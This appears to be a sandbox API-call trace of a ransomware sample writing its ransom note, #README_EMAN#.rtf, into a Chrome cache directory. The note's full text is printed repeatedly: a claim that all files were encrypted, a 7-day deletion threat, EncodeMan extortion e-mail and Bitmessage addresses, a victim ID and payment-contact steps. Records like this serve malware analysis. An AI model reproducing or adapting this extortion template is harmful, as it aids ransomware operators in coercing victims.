}}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.668] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24647a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nLp¬\x9d}67È\x90U«Ôg^úò\x1f$kZ\x02Ã`\x03^", lpUsedDefaultChar=0x0) returned 8717 [0289.668] WriteFile (in: hFile=0x2f0, lpBuffer=0x24647a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24647a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.669] CloseHandle (hObject=0x2f0) returned 1 [0289.669] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\index-dir\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\index-dir\\#readme_eman#.rtf")) returned 0xffffffff [0289.669] GetLastError () returned 0x2 [0289.669] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\index-dir\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\index-dir\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0289.669] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 